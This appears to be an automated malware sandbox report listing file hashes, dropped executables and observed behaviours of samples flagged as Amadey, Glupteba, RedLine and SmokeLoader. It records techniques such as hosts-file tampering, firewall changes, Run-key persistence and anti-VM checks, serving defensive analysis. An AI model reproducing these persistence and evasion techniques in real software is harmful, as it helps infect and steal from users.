SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

memory/2740-458-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/2740-459-0x0000000002724000-0x0000000002727000-memory.dmp

memory/2740-460-0x000000000272B000-0x0000000002762000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 430d7647b8c46c207dc007b48fe836ae
SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2956-470-0x000000000271B000-0x0000000002752000-memory.dmp

memory/2956-469-0x0000000002714000-0x0000000002717000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 430d7647b8c46c207dc007b48fe836ae
SHA1 e3e3b306e9b897647bdf16dbcb4f81bc58a929ff
SHA256 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f
SHA512 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95

memory/2556-528-0x0000000002294000-0x0000000002297000-memory.dmp

memory/2556-529-0x000000000229B000-0x00000000022D2000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7029e43242271f90359ed8193c1e4848
SHA1 b9d38c911e4b2e6cb03a242b02022e7ff365e150
SHA256 1a5f3744d5c71f5c96cf706649a8a3fb93b12f406562dd5fb142a94c4097017b
SHA512 2a03d3b38f8708e8b10c367451a2787f38da2ba8c0a487dfcd7ac962970e99060a41ef3278f2ca9b0c2c6bf1ac9c9529fac8f198ee3f9ca75aa896373da568ff

memory/2696-538-0x00000000022D0000-0x0000000002350000-memory.dmp

memory/2696-539-0x00000000022D0000-0x0000000002350000-memory.dmp

memory/2696-540-0x00000000022D0000-0x0000000002350000-memory.dmp

memory/2696-541-0x00000000022D0000-0x0000000002350000-memory.dmp

memory/2944-544-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2944-546-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/3068-547-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2852-550-0x0000000000840000-0x0000000000848000-memory.dmp

memory/2852-551-0x0000000001084000-0x0000000001087000-memory.dmp

memory/2852-552-0x000000000108B000-0x00000000010C2000-memory.dmp

memory/1980-554-0x0000000000940000-0x0000000000948000-memory.dmp

memory/1980-555-0x0000000000FD4000-0x0000000000FD7000-memory.dmp

memory/1980-556-0x0000000000FDB000-0x0000000001012000-memory.dmp

memory/3068-561-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2240-562-0x00000000004B0000-0x00000000004D0000-memory.dmp

memory/2240-570-0x00000000004B0000-0x00000000004D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/1304-586-0x000000002DCE0000-0x000000002E505000-memory.dmp

memory/1304-587-0x000000002DCE0000-0x000000002E505000-memory.dmp

memory/920-588-0x0000000000400000-0x0000000000C25000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-02 00:14

Reported

2023-07-02 00:17

Platform

win10v2004-20230621-en

Max time kernel

103s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2636 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1284 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1496 created 3172 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 5092 created 3172 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
